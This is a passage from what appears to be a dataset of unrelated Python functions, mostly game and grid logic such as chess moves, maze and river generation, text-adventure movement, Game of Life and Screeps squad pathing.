new_cell.get_neighbors_von_neuman():\n if neigh:\n if 
not(neigh is cell_xy):\n if neigh.name == \"river\":\n is_valid = False\n break\n elif \"water\" in neigh.material.name.lower():\n should_finish = True\n elif neigh in path:\n is_valid = False\n break\n if is_valid:\n cell_xy = new_cell\n path.append(new_cell)\n## print(\"OK\",dx,dy,section_length)\n else:\n break\n else:\n break\n #4) change the end to first shallow shore cell\n actual_path = []\n for cell in path:\n if cell.name == \"river\":\n break\n actual_path.append(cell)\n if \"water\" in cell.material.name.lower():\n break\n else: #LAKE ?\n next_to_water = False\n for neigh in cell.get_neighbors_von_neuman():\n if neigh:\n if \"water\" in neigh.material.name.lower():\n next_to_water = True\n break\n if next_to_water:\n break\n if len(actual_path) < min_length:\n return\n if actual_path[0].material.name == actual_path[-1].material.name:\n return\n elif not(\"water\" in actual_path[-1].material.name.lower()):\n if random.random() < lake_probability:\n pass\n else:\n return\n #build images of river\n objs = {}\n for delta in imgs: #imgs[(dx,dy)][zoom]\n river_obj = MapObject(me, imgs[delta][0], \"river\", 1.)\n river_obj.is_ground = True\n river_obj.lm = lm\n objs[delta] = river_obj\n #5) add river cells to map and layer\n for i,cell in enumerate(actual_path):\n prepare_cell_for_river(lm, cell)\n dx,dy,corner = get_path_orientation(i, cell, actual_path)\n if rounded_river:\n c = objs.get((dx,dy,corner))\n else:\n c = objs.get((dx,dy,None))\n if not c:\n raise Exception(\"No river object for delta\", dx, dy, corner)\n assert cell.name != \"river\"\n c = c.add_copy_on_cell(cell)\n cell.name = \"river\"\n lm.static_objects.append(c)\n\n if actual_path:\n## print(\"RIVER BUILT:\", [cell.coord for cell in actual_path])\n if not(\"water\" in actual_path[-1].material.name.lower()):\n for neigh in actual_path[-1].get_neighbors_moore():\n if neigh and neigh.name != \"river\":\n prepare_cell_for_river(lm, neigh)\n river_obj = MapObject(me, imgs[(0,0,None)][0], \"river\", 1.)\n river_obj.is_ground = True\n river_obj.lm = lm\n river_obj = river_obj.add_copy_on_cell(neigh)\n neigh.name = \"river\"\n lm.static_objects.append(river_obj)\n return objs", "def update(self):\n # Move left/right=====\n self.rect.x += self.change_x\n self.rect.y += self.change_y\n visited[int(self.rect.x/32)][int(self.rect.y/32)].append(self.id)\n\n self.path.append((int(self.rect.x/32), int(self.rect.y/32)))\n\n # if(self.rect.x == goal_x) & (self.rect.y == goal_y):\n # pygame.quit()\n # sys.exit(0)\n\n self.change_x = 0\n self.change_y = 0", "def move(argument, player):\n current_tile = world.tile_exists(player.location_x, player.location_y)\n if argument == \"north\":\n if world.tile_exists(player.location_x, player.location_y-1):\n new_tile = world.tile_exists(player.location_x, player.location_y-1)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x, player.location_y-1)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n elif argument == \"south\":\n if world.tile_exists(player.location_x, player.location_y+1):\n new_tile = world.tile_exists(player.location_x, player.location_y+1)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x, 
player.location_y+1)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n elif argument == \"east\":\n if world.tile_exists(player.location_x+1, player.location_y):\n new_tile = world.tile_exists(player.location_x + 1, player.location_y)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x+1, player.location_y)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n elif argument == \"west\":\n if world.tile_exists(player.location_x-1, player.location_y):\n new_tile = world.tile_exists(player.location_x-1, player.location_y)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x-1, player.location_y)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"Movement not recognized. Specify a cardinal direction.\")\n return", "def draw_room(screen, grid, start_location):\n wall_image = pygame.image.load(\"images/pillar.png\")\n wall_image_transparent = pygame.image.load(\"images/pillar_80.png\")\n floor_image = pygame.image.load(\"images/floor.png\")\n computer_image = pygame.image.load(\"images/desk_computer.png\")\n\n # map_to_image = [floor_image, # 0\n # wall_image, # 1\n # wall_image_transparent, # 2\n # computer_image] # 3\n map_to_image = {\n \"0\": floor_image,\n \"1\": wall_image,\n \"2\": wall_image_transparent,\n \"3\": computer_image,\n \"10\": wall_image # Secret passage\n }\n # better tile management for multiple environments / create multiple environments.\n # 0 = floor, 1 = wall (pillar)\n # First draw floor everywhere\n max_dimensions = grid.shape\n for r in range(max_dimensions[0]):\n for c in range(max_dimensions[1]):\n screen.blit(floor_image, (c * 30 + start_location[0],\n r * 30 + start_location[1]))\n\n for tile_type in [1, 2, 3, 10]:\n the_rows, the_cols = np.where(grid == tile_type)\n for i in range(len(the_cols)):\n screen.blit(map_to_image[str(tile_type)], (the_cols[i] * 30 + start_location[0],\n the_rows[i] * 30 + start_location[1]))", "def theRoof(pos, blockTypeMain = wool , mainColor=wPurple, replaceGlass = wGlass):\n \n # try again the same trick to add the roof\n # Middle part\n for i in range(0,12,1):\n iy = i\n if i >= 6:\n iy=11-i\n #print i, iy\n mc.setBlocks(pos.x-4+i, pos.y+10+iy, pos.z+4,\n pos.x-4+i, pos.y+10+iy, pos.z+29, blockTypeMain, mainColor)\n\n # RIGHT SIDE of the house\n for ii in range(0,3,1):\n mc.setBlocks(pos.x-5+ii, pos.y+9+ii, pos.z+5+ii,\n pos.x-13+ii, pos.y+9+ii, pos.z+29-ii, blockTypeMain, mainColor)\n #Remove the blocks\n\n material = air\n if ii >=2 :\n material = replaceGlass\n mc.setBlocks(pos.x-5+ii, pos.y+9+ii, pos.z+8,\n pos.x-11+ii, pos.y+9+ii, pos.z+26-ii, material)\n \n # and LEFT side of the house\n xAdjust = 21\n for ii in range(0,3,1):\n mc.setBlocks(pos.x-5-ii+xAdjust, pos.y+9+ii, pos.z+5+ii,\n pos.x-13-ii+xAdjust, pos.y+9+ii, pos.z+29-ii, blockTypeMain, mainColor)\n #Remove the blocks\n\n material = air\n if ii >=2 :\n material = replaceGlass\n mc.setBlocks(pos.x-7-ii+xAdjust, pos.y+9+ii, pos.z+8,\n pos.x-13-ii+xAdjust, pos.y+9+ii, pos.z+26-ii, material)", "def create_room(room):\n 
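# carve the room interior: every inner tile becomes walkable and see-through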
global map\n for x in range(room.x1+1, room.x2):\n for y in range(room.y1+1, room.y2):\n map[x][y].blocked = False\n map[x][y].block_sight = False", "def make_move(self, move, check_valid=True):\r\n self.board[move.sr][move.sc] = \"--\"\r\n self.board[move.er][move.ec] = move.pieceMoved\r\n self.moveLog.append(move)\r\n self.turn_white = not self.turn_white\r\n if move.pieceMoved == 'wk':\r\n self.wKingPos = (move.er, move.ec)\r\n elif move.pieceMoved == 'bk':\r\n self.bKingPos = (move.er, move.ec)\r\n\r\n if move.isEnpassantMove:\r\n self.board[move.sr][move.ec] = \"--\"\r\n\r\n if move.pieceMoved[1] == 'p' and abs(move.sr - move.er) == 2:\r\n self.enpas_pos = ((move.er + move.sr) // 2, move.ec)\r\n else:\r\n self.enpas_pos = ()\r\n\r\n if move.isPawnPromotion and not check_valid:\r\n promoted_piece = \"a\"\r\n while promoted_piece not in ('q', 'r', 'b', 'n'):\r\n promoted_piece = input(\"Promote to q, r, b, or n: \")\r\n self.board[move.er][move.ec] = move.pieceMoved[0] + promoted_piece\r\n\r\n # castle\r\n if move.castle:\r\n if move.ec - move.sc == 2:\r\n self.board[move.er][move.ec - 1] = self.board[move.er][move.ec + 1]\r\n self.board[move.er][move.ec + 1] = '--'\r\n else:\r\n self.board[move.er][move.ec + 1] = self.board[move.er][move.ec - 2]\r\n self.board[move.er][move.ec - 2] = '--'\r\n\r\n # castle rights on rook, king move\r\n self.update_castle_rights(move)\r\n self.castleRightsLog.append(CastleRights(self.cr_castle_r.wks, self.cr_castle_r.bks,\r\n self.cr_castle_r.wqs, self.cr_castle_r.bqs))", "def update(self):\n if self.x<0:\n self.x = 0\n\n if self.y <0:\n self.y = 0\n\n if bool(randint(0, 1))==True:\n if self.walker == True:\n self.x += randint(-2, 2)\n self.y += randint(-2, 2)", "def move(self, board, move_dir):\n if move_dir == \"right\":\n # failsafe: do not move through other cars on board\n if board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] == 'r':\n print(\"No movement!\")\n return board\n \n # give board correct new positions (characters)\n else:\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\"\n\n # change car objects positions\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) + 1)\n return board\n elif move_dir == \"left\": \n if board.positions[self.get_rows()[0]][self.get_cols()[0] - 1].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] == 'r':\n print(\"No movement!\")\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 2)] = \"x\"\n\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) - 1)\n return board\n elif move_dir == \"up\":\n #print(board.positions[self.get_rows()[0] - 1][self.get_cols()[0]])\n if board.positions[self.get_rows()[0] - 1][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n else:\n board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] = self.name[0]\n board.positions[self.get_rows()[1] + (self.size - 2)][self.get_cols()[0]] = \"x\"\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) - 1) + \".\" + str(self.get_cols()[0])\n\n 
#print(board)\n return board\n elif move_dir == \"down\": \n try: \n if board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n except IndexError:\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\" \n board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] = self.name[0]\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) + 1) + \".\" + str(self.get_cols()[0]) \n \n #print(self.position)\n #print(board)\n \n return board\n else:\n #print(\"NO MOVEMENT!\")\n return board", "def hallway(self):\n move_rooms = False\n option = None\n valid_move = False\n\n # Code to describe the hallway to the player.\n print(\"You are in the upstairs hallway.\")\n time.sleep(1)\n print(\"There is a painting on the wall.\")\n time.sleep(1)\n print(\"There are doors leading to the bedroom, bathroom and attic.\")\n time.sleep(1)\n print(\"There are also stairs leading down to the living room.\")\n time.sleep(1)\n\n # While loop allows player to interact with objects as many times \n # as they want.\n while move_rooms == False:\n print(\"What would you like to do?\")\n time.sleep(1)\n print(\"Look at the painting or move rooms?\")\n option = input(\"(Painting/Move) \\n\")\n # This block allows the player to interact with the painting.\n if option == \"Painting\" or option == \"painting\":\n self.objects.painting()\n # Allows player to move rooms.\n elif option == \"Move\" or option == \"move\":\n move_rooms = True\n # Prompts player to put valid input.\n else:\n print(\"Not a valid input, try again.\")\n \n # Loops over if room is not valid.\n while valid_move == False:\n print(\"Which room would you like to move to?\")\n time.sleep(1)\n print(\"The bedroom, bathroom, attic or living room?\")\n print(\"(Bedroom/Bathroom/Attic/Living)\")\n self.room_name = input()\n # If statement checks if the name is valid to escape while loop.\n if self.room_name == \"Bedroom\" or self.room_name == \"bedroom\" or self.room_name == \"Bathroom\" or self.room_name == \"bathroom\" or self.room_name == \"Attic\" or self.room_name == \"attic\" or self.room_name == \"Living\" or self.room_name == \"living\":\n valid_move = True\n else:\n print(\"Not a valid room, try again.\")", "def make_board(self):\n generate = lambda: random.randint(1, 100) in range(1, self.p_pit+1)\n some_number = self.some_number\n agent = Agent(some_number)\n agent.program = Oozeplorer_Percept(agent)\n self.add_agent(agent)\n gold = Gold()\n self.add_thing(gold, None)\n for row in range(1, some_number + 1):\n for col in range(1, some_number + 1):\n valid_spot = (row, col) != gold.location and (row, col) != (1, 1)\n if valid_spot and generate():\n t_pt = Pit()\n t_pt.location = (row, col)\n self.things.append(t_pt)", "def place_pillar_i(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__pillar_i = x, y\r\n if self.pillar_i_room() == self.pillar_a_room() or \\\r\n self.pillar_i_room() == self.pillar_e_room() or \\\r\n self.pillar_i_room() == self.pillar_p_room() or \\\r\n self.pillar_i_room() == self.entrance_room() or \\\r\n self.pillar_i_room() == self.exit_room():\r\n return self.place_pillar_i()\r\n self.__maze[x][y].set_pillar_i(True)", "def move(self, direction):\n\n # Check if there are empty tiles available\n for row in self._grid:\n if row.count(0) != 0:\n 
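# an empty (0) tile was found, so the board is not yet full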
self._game_over = False\n break\n else:\n self._game_over = True\n\n # If empty tiles are not available, game over\n if self._game_over == True:\n print \"Sorry Game Over, Board Full\"\n print self.__str__()\n return None\n\n # New tiles won't be needed for illegal moves\n new_tiles_needed = False\n\n for tile in self._initial_tiles[direction]:\n old_tiles = self.traverse_grid(tile, OFFSETS[direction], self._steps[direction])\n tiles = merge(old_tiles)\n if old_tiles != tiles:\n # The old row and the new row are different after the merge\n # New tile will be needed\n new_tiles_needed = True\n self.set_grid(tile, OFFSETS[direction], tiles)\n\n if new_tiles_needed == True:\n self.new_tile()", "def lander_crashed(self):\n self.lander_lives -= 1\n self.reset_lander(\"Lander crashed!\")", "def __init__(self, x_size, y_size, grid_data, player_x=None, player_y=None, player_heading=None, flag_x=None, flag_y=None):\n self.x_size = x_size\n self.y_size = y_size\n self.grid_data = grid_data\n\n for i in range(y_size):\n row = self.grid_data[i]\n for j in range(x_size):\n if row[j] == self.FLAG_SYMBOL:\n self.flag_x = j\n self.flag_y = i\n break\n\n # extract player position and heading if none given\n if player_x is None and player_y is None and player_heading is None:\n found = False\n for i in range(y_size):\n row = self.grid_data[i]\n for j in range(x_size):\n if row[j] == self.PLAYER_UP_SYMBOL or row[j] == self.PLAYER_DOWN_SYMBOL or \\\n row[j] == self.PLAYER_LEFT_SYMBOL or row[j] == self.PLAYER_RIGHT_SYMBOL:\n found = True\n self.player_x = j\n self.player_y = i\n self.player_heading = {self.PLAYER_UP_SYMBOL: self.UP,\n self.PLAYER_DOWN_SYMBOL: self.DOWN,\n self.PLAYER_LEFT_SYMBOL: self.LEFT,\n self.PLAYER_RIGHT_SYMBOL: self.RIGHT}[row[j]]\n # replace the player symbol with land tile\n row[j] = self.LAND_SYMBOL\n break\n if found:\n break\n if not found:\n raise Exception(\"LaserTank Map Error: Grid data does not contain player symbol\")\n elif player_x is None or player_y is None or player_heading is None:\n raise Exception(\"LaserTank Map Error: Incomplete player coordinates given\")\n else:\n self.player_x = player_x\n self.player_y = player_y\n self.player_heading = player_heading", "def make_move(grid, n_columns, n_rows):\r\n # Generate the game grid to be manipulated\r\n new_grid = [[0] * (n_columns + 1) for i in range(n_rows + 1)]\r\n\r\n\r\n for i in range(n_rows):\r\n for j in range(n_columns):\r\n upper_left = grid[i-1][j-1] # neighbor to upper left of cell of interest\r\n upper = grid[i-1][j] # neighbor above cell of interest\r\n upper_right = grid[i-1][j+1] # neighbor to upper right of cell of interest\r\n left = grid[i][j-1] # neighbor to left of cell of interest\r\n right = grid[i][j+1] # neighbor to right of cell of interest\r\n bot_left = grid[i+1][j-1] # neighbor to bottom left cell of interest\r\n bot = grid[i+1][j] # neighbor below cell of interest\r\n bot_right = grid[i+1][j+1] # neighbor to bottom right of cell of interest\r\n\r\n # sum of the state of all neighbors\r\n on_neighbors = upper_left + upper + upper_right + left + right + bot_left + bot + bot_right\r\n\r\n # Any ON cell with fewer than two ON neighbors turns OFF\r\n if grid[i][j] == 1 and on_neighbors < 2:\r\n new_grid[i][j] = 0\r\n\r\n # Any ON cell with two or three ON neighbours stays ON\r\n elif grid[i][j] == 1 and (on_neighbors == 2 or on_neighbors == 3):\r\n new_grid[i][j] = 1\r\n\r\n # Any ON cell with more than three ON neighbors turns OFF\r\n elif grid[i][j] == 1 and on_neighbors > 3:\r\n new_grid[i][j] 
= 0\r\n\r\n # Any OFF cell with three ON neighbors turns ON\r\n elif grid[i][j] == 0 and on_neighbors == 3:\r\n new_grid[i][j] = 1\r\n\r\n return new_grid #manipulated game grid\r", "def fill_single_street():\n if facing_north():\n if not on_beeper():\n if not front_is_clear():\n turn_right()\n move()\n if not on_beeper():\n turn_around()\n # back to the initial position\n move()\n turn_around()\n fill_one_line()", "def move_random(self, board: Board) -> None:\n rnd_move_idx = randint(0,4)\n # moves: stay, up, left, right, down\n moves = [[0,0], [0,-1], [-1,0], [1,0], [0,1]]\n\n if board.can_position_at(self.x + moves[rnd_move_idx][0], self.y + moves[rnd_move_idx][1]):\n board.set_element_at_position(0, self.x, self.y)\n self.x += moves[rnd_move_idx][0]\n self.y += moves[rnd_move_idx][1]\n board.set_element_at_position(3, self.x, self.y)\n print(\"Bomberman moved to [\", self.x, \",\", self.y, \"]\")", "def place_pillar_p(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__pillar_p = x, y\r\n if self.pillar_p_room() == self.pillar_a_room() or \\\r\n self.pillar_p_room() == self.pillar_e_room() or \\\r\n self.pillar_p_room() == self.pillar_i_room() or \\\r\n self.pillar_p_room() == self.entrance_room() or \\\r\n self.pillar_p_room() == self.exit_room():\r\n return self.place_pillar_p()\r\n self.__maze[x][y].set_pillar_p(True)", "async def update(self, robot):\r\n if self.first:\r\n robot.was_turning = False\r\n robot.was_driving = False\r\n\r\n rotation_rad = math.radians(robot.rotation)\r\n rotation_cos = math.cos(rotation_rad)\r\n rotation_sin = math.sin(rotation_rad)\r\n if robot.was_driving:\r\n speed_delta = robot.delta_time * robot.ROBOT_SPEED\r\n\r\n robot.add_odom_position(robot, (rotation_cos * speed_delta, rotation_sin * speed_delta))\r\n robot.grid.setStart(robot.grid_position)\r\n else:\r\n robot.drive_timer = robot.DRIVE_COOLDOWN\r\n if robot.was_turning:\r\n robot.add_odom_rotation(robot, robot.TURN_YAW * robot.delta_time)\r\n\r\n changed = False\r\n if robot.ball is not None:\r\n if robot.prev_ball is not None:\r\n robot.ball_grid = robot.grid.worldToGridCoords(robot.ball)\r\n robot.ball_prev_grid = robot.grid.worldToGridCoords(robot.prev_ball)\r\n changed = robot.ball_grid != robot.ball_prev_grid\r\n else:\r\n changed = True\r\n \r\n if not changed and robot.prev_grid_position != robot.grid_position:\r\n changed = True\r\n\r\n if self.first:\r\n changed = True\r\n self.first = False\r\n\r\n rounded_grid = (round(robot.grid_position[0]), round(robot.grid_position[1]))\r\n if changed:\r\n robot.grid.clearObstacles()\r\n if robot.ball is not None:\r\n grid_points = getGridPoints(robot.ball_grid[0], robot.ball_grid[1], robot)\r\n for point in grid_points:\r\n if robot.grid.coordInBounds(point):\r\n robot.grid.addObstacle(point)\r\n\r\n # Wall obstacles.\r\n for i in range(0, robot.grid.width):\r\n robot.grid.addObstacle((i, 0))\r\n robot.grid.addObstacle((i, robot.grid.height - 1))\r\n for i in range(1, robot.grid.height - 1):\r\n robot.grid.addObstacle((0, i))\r\n robot.grid.addObstacle((robot.grid.width - 1, i))\r\n\r\n goal_to_ball = np.subtract(robot.ball, robot.goal_position)\r\n goal_distance = np.linalg.norm(goal_to_ball)\r\n if goal_distance == 0:\r\n return\r\n goal_direction = np.divide(goal_to_ball, goal_distance)\r\n goal_direction = np.multiply(goal_direction, (robot.RADIUS + robot.BALL_RADIUS) * 1.2)\r\n robot.target_position = np.add(robot.ball, goal_direction)\r\n robot.target_position = 
robot.grid.worldToGridCoords(robot.target_position)\r\n\r\n if robot.target_position is not None:\r\n robot.grid.clearGoals()\r\n robot.grid.setStart(rounded_grid)\r\n rounded_target = (round(robot.target_position[0]), round(robot.target_position[1]))\r\n robot.grid.addGoal(rounded_target)\r\n astar(robot.grid, heuristic)\r\n\r\n path = robot.grid.getPath()\r\n robot.was_turning = False\r\n if path is not None and len(path) > 1:\r\n robot.next_cell = path[0]\r\n if path[0] == rounded_grid:\r\n robot.next_cell = path[1]\r\n\r\n turn = getTurnDirection(rotation_cos, rotation_sin, rounded_grid, robot.next_cell)\r\n if abs(turn) > robot.TURN_THRESHOLD and abs(2 * math.pi - abs(turn)) > robot.TURN_THRESHOLD:\r\n robot.stop_all_motors()\r\n await robot.turn_in_place(radians(turn), num_retries=3).wait_for_completed()\r\n robot.add_odom_rotation(robot, math.degrees(turn))\r\n robot.was_driving = False\r\n else:\r\n await robot.drive_wheels(robot.ROBOT_SPEED, robot.ROBOT_SPEED, robot.ROBOT_ACCELERATION, robot.ROBOT_ACCELERATION)\r\n robot.was_driving = True\r\n else:\r\n robot.was_driving = False\r\n\r\n turn = getTurnDirection(rotation_cos, rotation_sin, robot.grid_position, robot.target_position)\r\n robot.stop_all_motors()\r\n if abs(turn) > robot.TURN_THRESHOLD and abs(2 * math.pi - abs(turn)) > robot.TURN_THRESHOLD:\r\n await robot.turn_in_place(radians(turn), num_retries=3).wait_for_completed()\r\n robot.add_odom_rotation(robot, math.degrees(turn))\r\n\r\n robot.stop_all_motors()\r\n distance = grid_distance(robot.grid_position[0], robot.grid_position[1], robot.target_position[0], robot.target_position[1]) * robot.grid.scale\r\n await robot.drive_straight(distance_mm(distance), speed_mmps(robot.HIT_SPEED), should_play_anim = False).wait_for_completed()\r\n robot.add_odom_forward(robot, distance)\r\n\r\n turn = getTurnDirection(rotation_cos, rotation_sin, robot.grid_position, robot.ball_grid)\r\n robot.stop_all_motors()\r\n if abs(turn) > robot.TURN_THRESHOLD and abs(2 * math.pi - abs(turn)) > robot.TURN_THRESHOLD:\r\n await robot.turn_in_place(radians(turn), num_retries=3).wait_for_completed()\r\n robot.add_odom_rotation(robot, math.degrees(turn))\r\n return goto_ball.HitBall()", "def move_to_stage_1(self, target, any_hostiles):\n # type: (RoomPosition, bool) -> None\n ordered_members = self.members_movement_order()\n\n self.log(\"Members {} moving - stage 1.\", _.pluck(ordered_members, 'name'))\n\n options = self.new_movement_opts()\n\n home = ordered_members[0].home\n origin = self.find_origin()\n\n serialized_obj = home.hive.honey.get_serialized_path_obj(origin, target, options)\n ordered_rooms_in_path = honey.get_room_list_from_serialized_obj(serialized_obj)\n\n room_path_lengths = []\n for room_name in ordered_rooms_in_path:\n room_path_lengths.push(len(serialized_obj[room_name]) - 1)\n\n members_path_positions = []\n any_member_off_path = False\n\n furthest_back_hurt_index = None\n\n for index in range(0, len(ordered_members)):\n drone = ordered_members[index]\n\n if drone.creep.hits < drone.creep.hitsMax:\n furthest_back_hurt_index = index\n\n room_index = ordered_rooms_in_path.indexOf(drone.pos.roomName)\n if not room_index:\n # if drone != ordered_members[0]:\n any_member_off_path = True\n members_path_positions.push(None)\n continue\n room_path = serialized_obj[drone.pos.roomName]\n\n path_index, moving_direction, reverse_dir = drone.creep.findIndexAndDirectionInPath(room_path)\n\n if path_index < 0:\n self.log(\"..: position ({},{}) is not within {} ({}, {}, {})\",\n drone.pos.x, 
drone.pos.y, room_path, path_index, moving_direction, reverse_dir)\n any_member_off_path = True\n members_path_positions.push(None)\n continue\n\n members_path_positions.push({\n 'room': room_index,\n 'path': path_index,\n 'dir': moving_direction,\n 'rev': reverse_dir,\n })\n\n if any_member_off_path:\n for i in range(len(ordered_members) - 1, -1, -1):\n member = ordered_members[i]\n\n moving_now = False\n if members_path_positions[i] is None:\n # Since the member is definitely off the path\n self.log(\"Member {} ({}) off path - individually following military path ({} -> {})..\",\n member.name, member.pos, origin, target)\n\n else:\n if member.pos.x <= 2 or member.pos.x >= 48 or member.pos.y <= 2 or member.pos.y >= 48 \\\n or _.some(member.room.look_for_in_area_around(LOOK_STRUCTURES, member.pos, 1),\n lambda s: s.destination):\n moving_now = True\n else:\n # members near members that are off path should also move, to make room available.\n for i2 in range(0, len(ordered_members)):\n other_member = ordered_members[i2]\n if members_path_positions[i2] is None \\\n and movement.chebyshev_distance_room_pos(other_member.pos, member.pos) \\\n <= len(ordered_members) + 1:\n moving_now = True\n break\n\n if moving_now:\n direction = members_path_positions[i].dir\n # key code turned from findIndexAndDirectionInPath when we're at an exit and we should\n # just say put.\n if direction != -30:\n result = member.creep.move(direction)\n member.creep.__direction_moved = direction\n if result != OK and result != ERR_TIRED:\n member.log(\"Error moving by squad path ({}.move({})): {}\",\n member.creep, direction, result)\n member.follow_military_path(origin, target, options)\n else:\n more_to_move_without_near_edge = Infinity\n # iterate backwards over every member so we can break the loop easily if any further back members are\n # too far behind.\n # ordered_members[0] is the head of the group\n any_fatigued = False\n for i in range(len(ordered_members) - 1, -1, -1):\n drone = ordered_members[i]\n\n if drone.creep.fatigue:\n any_fatigued = True\n\n # will sometimes be undefined, but that's ok since it's only used if furthest_back_hurt_index > 1\n prev_drone = ordered_members[i + 1]\n move_obj = members_path_positions[i]\n\n if drone.memory.off_path_for:\n del drone.memory.next_ppos\n del drone.memory.off_path_for\n del drone.memory.lost_path_at\n\n if more_to_move_without_near_edge <= 0 and not movement.is_edge_position(drone.pos):\n continue\n else:\n more_to_move_without_near_edge -= 1\n\n # self.log(\"[{}] regular stage1 movement in dir {}\", drone.name, move_obj.dir)\n\n # key code turned from findIndexAndDirectionInPath when we're at an exit and we should\n # just say put.\n if not move_obj and i == 0:\n drone.follow_military_path(origin, target, options)\n else:\n if furthest_back_hurt_index > i:\n drone.log(\"moving backwards to help out.\")\n if not drone.pos.isNearTo(prev_drone.pos) and any_fatigued:\n if move_obj.rev != -30:\n result = drone.creep.move(move_obj.rev)\n drone.creep.__direction_moved = move_obj.rev\n if result != OK and result != ERR_TIRED:\n drone.log(\"Error moving by squad path ({}.move({})): {}\",\n drone.creep, move_obj.rev, result)\n continue\n\n if move_obj.dir != -30:\n result = drone.creep.move(move_obj.dir)\n drone.creep.__direction_moved = move_obj.dir\n if result != OK and result != ERR_TIRED:\n drone.log(\"Error moving by squad path ({}.move({})): {}\", drone.creep, move_obj.dir, result)\n\n if i != 0:\n next_member_obj = members_path_positions[i - 1]\n\n room_diff = 
next_member_obj['room'] - move_obj['room']\n if room_diff < 0:\n self.log(\"[{}] we're ahead - moving backwards ({})\", drone.name, move_obj.rev)\n if move_obj.rev != -30:\n result = drone.creep.move(move_obj.rev)\n drone.creep.__direction_moved = move_obj.rev\n if result != OK and result != ERR_TIRED:\n drone.log(\"Error moving by squad path ({}.move({})): {}\",\n drone.creep, move_obj.rev, result)\n continue\n elif room_diff == 0:\n abs_path_diff = next_member_obj['path'] - move_obj['path']\n\n if abs_path_diff < 0:\n self.log(\"[{}] we're ahead - moving backwards ({}).\", drone.name, move_obj.rev)\n if move_obj.rev != -30:\n result = drone.creep.move(move_obj.rev)\n drone.creep.__direction_moved = move_obj.rev\n if result != OK and result != ERR_TIRED:\n drone.log(\"Error moving by squad path ({}.move({})): {}\",\n drone.creep, move_obj.rev, result)\n continue\n elif room_diff == 1:\n # use the room path length to see how far we are to the edge of the room, to get an accurate\n # diff\n abs_path_diff = (next_member_obj['path'] - 4) \\\n + (room_path_lengths[move_obj['room']] - move_obj['path'])\n\n if abs_path_diff < 0:\n # room_path_lengths is an estimation, and may be off.\n abs_path_diff = next_member_obj['path']\n else:\n # just a message that we're quite far behind.\n abs_path_diff = 100\n\n self.log(\"[{}] room diff: {}, path diff: {}, pos: {}\",\n drone.name, room_diff, abs_path_diff, drone.pos)\n if abs_path_diff > 10 or (any_hostiles and abs_path_diff > 1):\n more_to_move_without_near_edge = 0\n continue\n elif abs_path_diff <= 1:\n more_to_move_without_near_edge += 1\n # TODO: move backwards to re-unite when there are hostiles.", "def sling_action():\n global mouse_distance\n global rope_length\n global angle\n global mouse_x_pos\n global mouse_y_pos\n\n #add code inside sling function\n # Fixing bird to the sling rope\n vec = vector((initial_x_sling, initial_y_sling), (mouse_x_pos, mouse_y_pos))\n unit_vec = unit_vector(vec)\n uv_1 = unit_vec[0]\n uv_2 = unit_vec[1]\n mouse_distance = distance(initial_x_sling, initial_y_sling, mouse_x_pos, mouse_y_pos) #point at which currrent bird id\n fix_pos = (uv_1*rope_length+initial_x_sling, uv_2*rope_length+initial_y_sling)\n highest_length = 102 #when stretched\n\n #to make bird stay within rope\n x_redbird = mouse_x_pos - 20\n y_redbird = mouse_y_pos - 20\n if mouse_distance > rope_length:\n pux, puy = fix_pos\n pux -= 20\n puy -= 20\n first_pos = pux, puy\n screen.blit(redbird, first_pos)\n second_pos = (uv_1*highest_length+initial_x_sling, uv_2*highest_length+initial_y_sling) #current position\n pygame.draw.line(screen, (255, 0, 0), (next_x_sling, next_y_sling), second_pos, 5) #catapult rope\n screen.blit(redbird, first_pos)\n pygame.draw.line(screen, (255, 0, 0), (initial_x_sling, initial_y_sling), second_pos, 5) #ANOTHER SIDE of catapult\n else:\n #when not fully stretched\n mouse_distance += 10\n third_pos = (uv_1*mouse_distance+initial_x_sling, uv_2*mouse_distance+initial_y_sling)\n pygame.draw.line(screen, (0, 0, 0), (next_x_sling, next_y_sling), third_pos, 5)\n screen.blit(redbird, (x_redbird, y_redbird))\n pygame.draw.line(screen, (0, 0, 0), 